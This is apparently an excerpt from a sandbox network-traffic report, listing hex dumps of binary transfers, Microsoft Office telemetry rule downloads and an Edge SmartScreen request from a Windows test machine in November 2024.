                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d d9 e8 78 24 ab 24 51 69 66 82 d7 44 e8 1d cf c8 e2 16 60 37
                                                                                                                                                                                                                                                        Data Ascii: kD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)|[U35QTB-x$$QifD`7
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 6e 30 91 49 05 4e 42 60 22 53 9e 67 6f 08 ac 30 cf 05 cd b5
                                                                                                                                                                                                                                                        Data Ascii: sg9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE}*Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqPn0INB`"Sgo0
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e 6f 2b 5e 74 f2 ea 6e 17 ed 6d 37 04 2d f5 5a 8e f8 43 2b c3
                                                                                                                                                                                                                                                        Data Ascii: MR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0o*j~~{Y1U}n|?*4>tk,OS]|w}:)y7gg3r#YU]oU~Cl.Vo+^tnm7-ZC+
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 4e 60 6b e1 20 c2 ba 99 b8 6d 1e 51 d5 3c d5 da e1 b5 2c a1
                                                                                                                                                                                                                                                        Data Ascii: yfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\N`k mQ<,
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 45 bf 50 93 bc bc 7d c3 e9 75 22 5d 68 d9 1e 50 8f 5c 23 a1
                                                                                                                                                                                                                                                        Data Ascii: b.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>JcEP}u"]hP\#
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 c6 95 ea 57 bd 73 50 18 1d 54 fb 07 d5 da 41 bd 99 aa 6f 53
                                                                                                                                                                                                                                                        Data Ascii: u\m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{OWsPTAoS
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 65 5d 3f 2f 1b ab ff 79 9a 2b b3 79 5d 62 4f 7c d5 ff 34 22
                                                                                                                                                                                                                                                        Data Ascii: Jj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;|.'Ocl7vUh&n{G]%vHN@e]?/y+y]bO|4"
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 cb e9 d4 75 42 52 43 29 e8 e5 94 bf 82 e4 a6 c8 40 37 67 5f
                                                                                                                                                                                                                                                        Data Ascii: IdqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K`|'5Z:-#BoFX1-3JESJY(bJX*@D[93&Pq<jy@^2%S^?`>uBRC)@7g_


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        49192.168.2.54983013.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:38 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:38 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                        x-ms-request-id: 7f65af6f-801e-0067-5f8c-3afe30000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234938Z-r1d97b995777mdbwhC1TEBezag00000009ng000000002891
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        50192.168.2.54983213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:39 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                        x-ms-request-id: 657669b3-a01e-0002-118c-3a5074000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234939Z-r1d97b9957744xz5hC1TEB5bf800000009bg00000000p5ez
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        51192.168.2.54983113.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:39 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                        x-ms-request-id: 29297304-901e-0083-6776-3bbb55000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234939Z-1777c6cb7544nvmshC1TEBf7qc0000000a70000000000grf
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        52192.168.2.54983313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:39 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                        x-ms-request-id: 53f81142-401e-0064-400e-3b54af000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234939Z-r1d97b99577656nchC1TEBk98c00000009mg00000000cktx
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        53192.168.2.549834172.183.192.1094437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC723OUTPOST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1
                                                                                                                                                                                                                                                        Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 746
                                                                                                                                                                                                                                                        Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                        Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiV1hZdi9tRDNoR2VLNjExWStDZDdZZz09IiwgImhhc2giOiJIZVVISUxHa1Z4WT0ifQ==
                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                        If-None-Match: "636976985063396749.rel.v2"
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC746OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                        Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:39 GMT
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        Content-Length: 57
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Server: Kestrel
                                                                                                                                                                                                                                                        ETag: "638343870221005468"
                                                                                                                                                                                                                                                        Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC57INData Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d
                                                                                                                                                                                                                                                        Data Ascii: 9murmur3,MhZ8\<&LiH[?m


